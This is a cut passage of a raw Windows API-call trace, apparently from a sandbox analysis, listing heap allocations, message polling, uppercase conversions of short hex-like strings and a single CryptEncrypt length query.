wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.578] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0087.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0087.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0087.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0087.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0087.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0087.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0087.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0087.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.579] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0087.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0087.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0087.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0087.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0087.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0087.579] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0087.579] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0087.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0087.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.580] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0087.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0087.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0087.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0087.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0087.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0087.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0087.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0087.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0087.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.580] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0087.580] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0087.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0087.580] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0087.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0087.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0087.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0087.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0087.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.581] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0087.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0087.581] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0087.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0087.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0087.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0087.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.581] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0087.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0087.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0087.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0087.581] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0087.581] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0087.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0087.581] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0087.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0087.582] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0087.582] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0087.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0087.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.582] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0087.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0087.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a00 [0087.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73e48 [0087.582] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0087.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0087.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0087.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0087.582] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0087.582] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0087.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0087.582] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.583] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0087.583] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.583] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0087.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0087.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0087.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0087.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0087.583] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.583] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0087.583] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0087.583] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0087.583] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.583] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0087.583] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.583] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.583] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0087.583] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0087.583] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.584] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.584] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.584] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.584] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.584] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.584] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.584] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.584] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0087.585] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0087.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9d00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0087.585] CryptEncrypt (in: hKey=0x9a4280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xe243, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xe248) returned 1 [0087.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0087.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.585] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0087.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0087.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.585] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0087.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0087.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0087.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0087.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0087.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0087.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0087.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0087.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0087.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0087.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0087.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0087.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0087.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0087.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0087.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0087.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0087.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.586] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0087.586] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0087.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0087.587] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.587] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: 